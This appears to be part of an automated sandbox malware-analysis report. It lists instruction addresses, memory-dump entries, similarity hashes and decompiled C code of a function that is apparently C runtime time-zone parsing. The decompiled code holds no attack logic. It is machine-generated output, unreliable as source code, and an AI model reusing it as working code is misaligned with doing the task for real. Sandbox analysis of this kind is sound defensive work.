                                                                                                0x0044230c
                                                                                                0x00442304
                                                                                                0x00442304
                                                                                                0x00442304
                                                                                                0x00442302
                                                                                                0x00442321
                                                                                                0x00000000
                                                                                                0x00442327
                                                                                                0x00442330
                                                                                                0x00442337
                                                                                                0x00442341
                                                                                                0x00442344
                                                                                                0x0044234c
                                                                                                0x00442354
                                                                                                0x0044235c
                                                                                                0x00442363
                                                                                                0x00442369
                                                                                                0x00442370
                                                                                                0x00442372
                                                                                                0x00442388
                                                                                                0x00442396
                                                                                                0x00442374
                                                                                                0x00442381
                                                                                                0x00442381
                                                                                                0x0044239b
                                                                                                0x0044239f
                                                                                                0x00000000
                                                                                                0x004423a5
                                                                                                0x004423a5
                                                                                                0x004423a8
                                                                                                0x004423ad
                                                                                                0x004423b1
                                                                                                0x0044240b
                                                                                                0x0044240b
                                                                                                0x0044240d
                                                                                                0x0044240d
                                                                                                0x00442412
                                                                                                0x00442492
                                                                                                0x00442494
                                                                                                0x00442499
                                                                                                0x00442710
                                                                                                0x00442710
                                                                                                0x00442710
                                                                                                0x00442713
                                                                                                0x00442716
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004424a2
                                                                                                0x004424a5
                                                                                                0x0044247c
                                                                                                0x0044247e
                                                                                                0x00442491
                                                                                                0x00442491
                                                                                                0x004424a7
                                                                                                0x004424ab
                                                                                                0x004424ab
                                                                                                0x004424ad
                                                                                                0x004424b0
                                                                                                0x004424b2
                                                                                                0x004424b5
                                                                                                0x004424b5
                                                                                                0x004424b8
                                                                                                0x004424b9
                                                                                                0x004424b9
                                                                                                0x004424be
                                                                                                0x004424c1
                                                                                                0x004424c4
                                                                                                0x004424c7
                                                                                                0x004424ca
                                                                                                0x004425ff
                                                                                                0x004425ff
                                                                                                0x00442602
                                                                                                0x004426cf
                                                                                                0x004426cf
                                                                                                0x004426d2
                                                                                                0x004426eb
                                                                                                0x004426ef
                                                                                                0x004426ef
                                                                                                0x004426f1
                                                                                                0x004426f1
                                                                                                0x004426fe
                                                                                                0x00442701
                                                                                                0x00442706
                                                                                                0x00442709
                                                                                                0x0044270b
                                                                                                0x00442726
                                                                                                0x00000000
                                                                                                0x0044272c
                                                                                                0x0044270d
                                                                                                0x0044270d
                                                                                                0x00000000
                                                                                                0x0044270d
                                                                                                0x004426d4
                                                                                                0x004426d4
                                                                                                0x004426d7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426d9
                                                                                                0x004426d9
                                                                                                0x004426dc
                                                                                                0x004426e1
                                                                                                0x004426e4
                                                                                                0x004426e7
                                                                                                0x00000000
                                                                                                0x004426e7
                                                                                                0x00442608
                                                                                                0x00442608
                                                                                                0x0044260b
                                                                                                0x004426bb
                                                                                                0x004426bb
                                                                                                0x004426be
                                                                                                0x004426c7
                                                                                                0x004426cb
                                                                                                0x004426cb
                                                                                                0x00000000
                                                                                                0x004426cb
                                                                                                0x004426c0
                                                                                                0x004426c0
                                                                                                0x004426c3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426c5
                                                                                                0x00442611
                                                                                                0x00442611
                                                                                                0x00442614
                                                                                                0x004426a7
                                                                                                0x004426a7
                                                                                                0x004426aa
                                                                                                0x004426b3
                                                                                                0x004426b7
                                                                                                0x004426b7
                                                                                                0x00000000
                                                                                                0x004426b7
                                                                                                0x004426ac
                                                                                                0x004426ac
                                                                                                0x004426af
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426b1
                                                                                                0x0044261a
                                                                                                0x0044261a
                                                                                                0x0044261d
                                                                                                0x00442646
                                                                                                0x00442649
                                                                                                0x0044264d
                                                                                                0x00442657
                                                                                                0x0044264f
                                                                                                0x0044264f
                                                                                                0x0044264f
                                                                                                0x0044265d
                                                                                                0x00442660
                                                                                                0x0044267c
                                                                                                0x0044267c
                                                                                                0x0044267f
                                                                                                0x00442682
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442688
                                                                                                0x0044268b
                                                                                                0x0044268b
                                                                                                0x0044268e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442692
                                                                                                0x00442695
                                                                                                0x00442698
                                                                                                0x0044269b
                                                                                                0x0044269d
                                                                                                0x004426a0
                                                                                                0x004426a3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004426a5
                                                                                                0x00442662
                                                                                                0x00442662
                                                                                                0x00442665
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442667
                                                                                                0x0044266f
                                                                                                0x00442672
                                                                                                0x00442675
                                                                                                0x00442675
                                                                                                0x00000000
                                                                                                0x00442660
                                                                                                0x0044261f
                                                                                                0x00442622
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442629
                                                                                                0x00442629
                                                                                                0x0044262c
                                                                                                0x0044263f
                                                                                                0x00000000
                                                                                                0x0044263f
                                                                                                0x0044262f
                                                                                                0x0044262f
                                                                                                0x00442632
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442638
                                                                                                0x00000000
                                                                                                0x00442638
                                                                                                0x004424d0
                                                                                                0x004425ce
                                                                                                0x004425ce
                                                                                                0x004425d1
                                                                                                0x004425f4
                                                                                                0x004425f8
                                                                                                0x004425f8
                                                                                                0x00000000
                                                                                                0x004425f8
                                                                                                0x004425d3
                                                                                                0x004425d3
                                                                                                0x004425d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425d8
                                                                                                0x004425d8
                                                                                                0x004425db
                                                                                                0x004425ed
                                                                                                0x00000000
                                                                                                0x004425ed
                                                                                                0x004425dd
                                                                                                0x004425dd
                                                                                                0x004425e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425e6
                                                                                                0x00000000
                                                                                                0x004425e6
                                                                                                0x004424d6
                                                                                                0x004424d9
                                                                                                0x0044257b
                                                                                                0x0044257b
                                                                                                0x00442580
                                                                                                0x00442586
                                                                                                0x00442586
                                                                                                0x00442587
                                                                                                0x0044258a
                                                                                                0x00442590
                                                                                                0x00442593
                                                                                                0x00442596
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044259c
                                                                                                0x0044259f
                                                                                                0x0044259f
                                                                                                0x004425a2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425aa
                                                                                                0x004425ab
                                                                                                0x004425ae
                                                                                                0x004425b1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425b9
                                                                                                0x004425bc
                                                                                                0x004425bf
                                                                                                0x004425c1
                                                                                                0x004425c4
                                                                                                0x004425c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004425c9
                                                                                                0x0044259f
                                                                                                0x00000000
                                                                                                0x0044258a
                                                                                                0x004424df
                                                                                                0x004424e2
                                                                                                0x004424f7
                                                                                                0x004424fd
                                                                                                0x00442504
                                                                                                0x00442506
                                                                                                0x00442561
                                                                                                0x00442567
                                                                                                0x00442568
                                                                                                0x0044256a
                                                                                                0x0044256f
                                                                                                0x0044256f
                                                                                                0x00442508
                                                                                                0x00442508
                                                                                                0x0044250b
                                                                                                0x0044250b
                                                                                                0x00442572
                                                                                                0x00000000
                                                                                                0x00442572
                                                                                                0x004424e4
                                                                                                0x004424e7
                                                                                                0x00442541
                                                                                                0x00442541
                                                                                                0x00442544
                                                                                                0x00442550
                                                                                                0x00442554
                                                                                                0x00442554
                                                                                                0x00000000
                                                                                                0x00442554
                                                                                                0x00442546
                                                                                                0x00442546
                                                                                                0x00442549
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044254b
                                                                                                0x004424e9
                                                                                                0x004424ec
                                                                                                0x00442510
                                                                                                0x00442510
                                                                                                0x00442513
                                                                                                0x00442536
                                                                                                0x0044253a
                                                                                                0x0044253a
                                                                                                0x00000000
                                                                                                0x0044253a
                                                                                                0x00442515
                                                                                                0x00442515
                                                                                                0x00442518
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044251a
                                                                                                0x0044251a
                                                                                                0x0044251d
                                                                                                0x0044252f
                                                                                                0x00000000
                                                                                                0x0044252f
                                                                                                0x0044251f
                                                                                                0x0044251f
                                                                                                0x00442522
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442528
                                                                                                0x00000000
                                                                                                0x00442528
                                                                                                0x004424ee
                                                                                                0x004424f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004424f1
                                                                                                0x00000000
                                                                                                0x0044271c
                                                                                                0x00442414
                                                                                                0x0044241b
                                                                                                0x00442444
                                                                                                0x0044241d
                                                                                                0x0044242c
                                                                                                0x0044242c
                                                                                                0x0044244b
                                                                                                0x0044244d
                                                                                                0x00442450
                                                                                                0x00442475
                                                                                                0x00442476
                                                                                                0x00000000
                                                                                                0x00442452
                                                                                                0x00442452
                                                                                                0x00442455
                                                                                                0x00442458
                                                                                                0x0044245f
                                                                                                0x00442462
                                                                                                0x00442465
                                                                                                0x00442468
                                                                                                0x0044246b
                                                                                                0x0044246d
                                                                                                0x00442470
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442470
                                                                                                0x00442472
                                                                                                0x00000000
                                                                                                0x00442472
                                                                                                0x00442450
                                                                                                0x004423b8
                                                                                                0x004423ba
                                                                                                0x004423bc
                                                                                                0x004423c4
                                                                                                0x004423e9
                                                                                                0x004423eb
                                                                                                0x004423f5
                                                                                                0x004423f7
                                                                                                0x004423fa
                                                                                                0x004423fb
                                                                                                0x004423fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442403
                                                                                                0x004423e4
                                                                                                0x004423e4
                                                                                                0x00000000
                                                                                                0x004423e4
                                                                                                0x004423c8
                                                                                                0x004423cc
                                                                                                0x004423d1
                                                                                                0x004423d3
                                                                                                0x004423d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004423de
                                                                                                0x00000000
                                                                                                0x004423de
                                                                                                0x0044239f

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                • String ID: ;(D$a/p$am/pm
                                                                                                • API String ID: 2936374016-2297828916
                                                                                                • Opcode ID: 134c509f18729406fef0f45b447d530e6f8f2c60208d3c3a1361e3cfde8e7eb8
                                                                                                • Instruction ID: f9a5e106efaf280df31031083ff57afecb36302f92ebf721301bb0ada59f46fc
                                                                                                • Opcode Fuzzy Hash: 134c509f18729406fef0f45b447d530e6f8f2c60208d3c3a1361e3cfde8e7eb8
                                                                                                • Instruction Fuzzy Hash: 3FD1D171910206DAEB249F68CA957BBB7B0FF05300FA5415BF901AB350D7BD8D81CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00443EE3, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E00443EE3(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E00443B22();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E00443B80( &_v8) != 0 || E00443B28( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00437736();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E00443B22();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E00443B80( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00437736();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x46c00c; // 0x4cc22724
						_v100 = _t74 ^ _t192;
						 *0x46c334 =  *0x46c334 | 0xffffffff;
						 *0x46c328 =  *0x46c328 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x46d748 = 0;
						_t78 = E00437B05(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E00440C6C(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E00437B05(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E004414D5(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E004414D5();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E00443EE3(_t139, _t172, _t183, __eflags);
							}
						}
						E004414D5(_t183);
						__eflags = _v16 ^ _t192;
						return E00430A5B(_v16 ^ _t192);
					} else {
						_t89 = E00443B28( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E00443B54( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E004414D5( *0x46d740);
								 *0x46d740 = 0;
								 *_t194 = 0x46d750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x46d750 * 0x3c;
									_t167 =  *0x46d7a4; // 0x0
									_push(_t171);
									 *0x46d748 = 1;
									_v12 = _t150;
									__eflags =  *0x46d796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x46d7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x46d7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0044083B(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x46d754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46d7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E00443B1C()) = _v12;
								 *((intOrPtr*)(E00443B10())) = _v16;
								_t96 = E00443B16();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46d740; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E004414D5(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x4442d4
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x4442d5
						 *0x46d740 = E00440C6C(_t154 - _t169, _t13);
						_t116 = E004414D5(0);
						_t170 =  *0x46d740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x4442d4
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x4442d5
							_t119 = E0043CAAC(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E00439D83(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E004374E4(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E004374E4(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E004374E4(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E00443B1C()) = _v8;
										_t128 = E00443B10();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E00439D83(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}




































































                                                                                                0x00443ee3
                                                                                                0x00443ee3
                                                                                                0x00443eed
                                                                                                0x00443ef2
                                                                                                0x00443ef6
                                                                                                0x00443ef8
                                                                                                0x00443f00
                                                                                                0x00443f0b
                                                                                                0x004440ab
                                                                                                0x004440ad
                                                                                                0x004440ae
                                                                                                0x004440af
                                                                                                0x004440b0
                                                                                                0x004440b1
                                                                                                0x004440b2
                                                                                                0x004440b7
                                                                                                0x004440bb
                                                                                                0x004440bd
                                                                                                0x004440c0
                                                                                                0x004440c7
                                                                                                0x004440ce
                                                                                                0x004440d2
                                                                                                0x004440d5
                                                                                                0x004440d8
                                                                                                0x004440dd
                                                                                                0x004440de
                                                                                                0x004440e0
                                                                                                0x00444208
                                                                                                0x00444208
                                                                                                0x00444209
                                                                                                0x0044420a
                                                                                                0x0044420b
                                                                                                0x0044420c
                                                                                                0x0044420d
                                                                                                0x00444212
                                                                                                0x00444215
                                                                                                0x00444216
                                                                                                0x0044421e
                                                                                                0x00444225
                                                                                                0x00444228
                                                                                                0x00444235
                                                                                                0x0044423c
                                                                                                0x0044423d
                                                                                                0x0044423e
                                                                                                0x0044423f
                                                                                                0x00444244
                                                                                                0x00444253
                                                                                                0x0044425a
                                                                                                0x00444262
                                                                                                0x00444264
                                                                                                0x0044426e
                                                                                                0x00444271
                                                                                                0x0044427e
                                                                                                0x00444281
                                                                                                0x00444283
                                                                                                0x0044429c
                                                                                                0x004442a4
                                                                                                0x004442a6
                                                                                                0x004442ac
                                                                                                0x004442b1
                                                                                                0x004442a8
                                                                                                0x004442a8
                                                                                                0x00000000
                                                                                                0x004442a8
                                                                                                0x00444285
                                                                                                0x00444285
                                                                                                0x00444286
                                                                                                0x00444286
                                                                                                0x00444286
                                                                                                0x004442b3
                                                                                                0x00444266
                                                                                                0x00444266
                                                                                                0x00444266
                                                                                                0x004442c0
                                                                                                0x004442c2
                                                                                                0x004442c4
                                                                                                0x004442c6
                                                                                                0x004442d6
                                                                                                0x004442d6
                                                                                                0x004442c8
                                                                                                0x004442c8
                                                                                                0x004442cb
                                                                                                0x00000000
                                                                                                0x004442cd
                                                                                                0x004442cd
                                                                                                0x004442ce
                                                                                                0x004442d3
                                                                                                0x004442cb
                                                                                                0x004442dc
                                                                                                0x004442e7
                                                                                                0x004442f2
                                                                                                0x004440e6
                                                                                                0x004440ea
                                                                                                0x004440ef
                                                                                                0x004440f0
                                                                                                0x004440f2
                                                                                                0x00000000
                                                                                                0x004440f8
                                                                                                0x004440fc
                                                                                                0x00444101
                                                                                                0x00444102
                                                                                                0x00444104
                                                                                                0x00000000
                                                                                                0x0044410a
                                                                                                0x00444110
                                                                                                0x00444115
                                                                                                0x0044411b
                                                                                                0x00444122
                                                                                                0x00444128
                                                                                                0x0044412b
                                                                                                0x00444131
                                                                                                0x00444138
                                                                                                0x0044413e
                                                                                                0x00444142
                                                                                                0x00444148
                                                                                                0x0044414b
                                                                                                0x00444152
                                                                                                0x00444157
                                                                                                0x00444157
                                                                                                0x00444159
                                                                                                0x00444159
                                                                                                0x0044415c
                                                                                                0x00444163
                                                                                                0x0044417b
                                                                                                0x0044417b
                                                                                                0x0044417e
                                                                                                0x00444165
                                                                                                0x00444165
                                                                                                0x0044416a
                                                                                                0x0044416c
                                                                                                0x00000000
                                                                                                0x0044416e
                                                                                                0x00444170
                                                                                                0x00444176
                                                                                                0x00444176
                                                                                                0x0044416c
                                                                                                0x00444186
                                                                                                0x0044419a
                                                                                                0x004441a0
                                                                                                0x004441a2
                                                                                                0x004441b0
                                                                                                0x004441b2
                                                                                                0x004441a4
                                                                                                0x004441a4
                                                                                                0x004441a7
                                                                                                0x00000000
                                                                                                0x004441a9
                                                                                                0x004441ab
                                                                                                0x004441ab
                                                                                                0x004441a7
                                                                                                0x004441c7
                                                                                                0x004441ce
                                                                                                0x004441d0
                                                                                                0x004441df
                                                                                                0x004441e2
                                                                                                0x004441d2
                                                                                                0x004441d2
                                                                                                0x004441d5
                                                                                                0x00000000
                                                                                                0x004441d7
                                                                                                0x004441da
                                                                                                0x004441da
                                                                                                0x004441d5
                                                                                                0x004441d0
                                                                                                0x004441ec
                                                                                                0x004441f6
                                                                                                0x004441fb
                                                                                                0x00444200
                                                                                                0x00444207
                                                                                                0x00444207
                                                                                                0x00444104
                                                                                                0x004440f2
                                                                                                0x00443f23
                                                                                                0x00443f23
                                                                                                0x00443f29
                                                                                                0x00443f2e
                                                                                                0x00443f64
                                                                                                0x00443f65
                                                                                                0x00443f6b
                                                                                                0x00443f6d
                                                                                                0x00443f6d
                                                                                                0x00443f70
                                                                                                0x00443f70
                                                                                                0x00443f72
                                                                                                0x00443f73
                                                                                                0x00443f79
                                                                                                0x00443f84
                                                                                                0x00443f89
                                                                                                0x00443f8e
                                                                                                0x00443f98
                                                                                                0x00000000
                                                                                                0x00443f9e
                                                                                                0x00443f9e
                                                                                                0x00443fa0
                                                                                                0x00443fa1
                                                                                                0x00443fa1
                                                                                                0x00443fa4
                                                                                                0x00443fa4
                                                                                                0x00443fa6
                                                                                                0x00443fa7
                                                                                                0x00443fae
                                                                                                0x00443fb3
                                                                                                0x00443fb8
                                                                                                0x00443fbd
                                                                                                0x00443fc5
                                                                                                0x00443fc6
                                                                                                0x00443fcc
                                                                                                0x00443fd1
                                                                                                0x00443fd6
                                                                                                0x00443fdc
                                                                                                0x00443fe1
                                                                                                0x00443fe2
                                                                                                0x00443fe5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00443fe5
                                                                                                0x00443fea
                                                                                                0x00443feb
                                                                                                0x00443ff0
                                                                                                0x00443ff2
                                                                                                0x00443ff2
                                                                                                0x00443ffa
                                                                                                0x00444000
                                                                                                0x00444003
                                                                                                0x00444003
                                                                                                0x00444007
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444011
                                                                                                0x00444011
                                                                                                0x00444014
                                                                                                0x00444017
                                                                                                0x00444019
                                                                                                0x00444027
                                                                                                0x00444029
                                                                                                0x00444033
                                                                                                0x00444033
                                                                                                0x00444035
                                                                                                0x00444037
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044402e
                                                                                                0x00444030
                                                                                                0x00444032
                                                                                                0x00444032
                                                                                                0x00000000
                                                                                                0x00444032
                                                                                                0x00000000
                                                                                                0x00444030
                                                                                                0x00444039
                                                                                                0x0044403c
                                                                                                0x0044403e
                                                                                                0x00444049
                                                                                                0x0044404b
                                                                                                0x00444055
                                                                                                0x00444055
                                                                                                0x00444057
                                                                                                0x00444059
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444050
                                                                                                0x00444052
                                                                                                0x00444054
                                                                                                0x00444054
                                                                                                0x00000000
                                                                                                0x00444054
                                                                                                0x00000000
                                                                                                0x00444052
                                                                                                0x00444055
                                                                                                0x0044403c
                                                                                                0x0044405b
                                                                                                0x0044405b
                                                                                                0x0044405d
                                                                                                0x00444061
                                                                                                0x00444061
                                                                                                0x00444066
                                                                                                0x00444068
                                                                                                0x0044406b
                                                                                                0x0044406e
                                                                                                0x00444070
                                                                                                0x00444073
                                                                                                0x0044408b
                                                                                                0x0044408e
                                                                                                0x00444091
                                                                                                0x00444099
                                                                                                0x0044409e
                                                                                                0x004440a3
                                                                                                0x00000000
                                                                                                0x004440a3
                                                                                                0x00444075
                                                                                                0x0044407a
                                                                                                0x0044407d
                                                                                                0x00444082
                                                                                                0x00444085
                                                                                                0x00444087
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444089
                                                                                                0x00443fd6
                                                                                                0x00000000
                                                                                                0x00443fbd
                                                                                                0x00443f30
                                                                                                0x00443f30
                                                                                                0x00443f32
                                                                                                0x00443f34
                                                                                                0x00443f34
                                                                                                0x00443f38
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00443f3c
                                                                                                0x00443f50
                                                                                                0x00443f50
                                                                                                0x00443f3e
                                                                                                0x00443f3e
                                                                                                0x00443f3e
                                                                                                0x00443f44
                                                                                                0x00000000
                                                                                                0x00443f46
                                                                                                0x00443f46
                                                                                                0x00443f49
                                                                                                0x00443f4e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00443f4e
                                                                                                0x00443f44
                                                                                                0x00443f59
                                                                                                0x00443f5b
                                                                                                0x004440aa
                                                                                                0x004440aa
                                                                                                0x00443f61
                                                                                                0x00443f61
                                                                                                0x00000000
                                                                                                0x00443f61
                                                                                                0x00000000
                                                                                                0x00443f5b
                                                                                                0x00443f54
                                                                                                0x00443f56
                                                                                                0x00443f56
                                                                                                0x00000000
                                                                                                0x00443f56
                                                                                                0x00443f2e
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443F65
                                                                                                • _free.LIBCMT ref: 00443F89
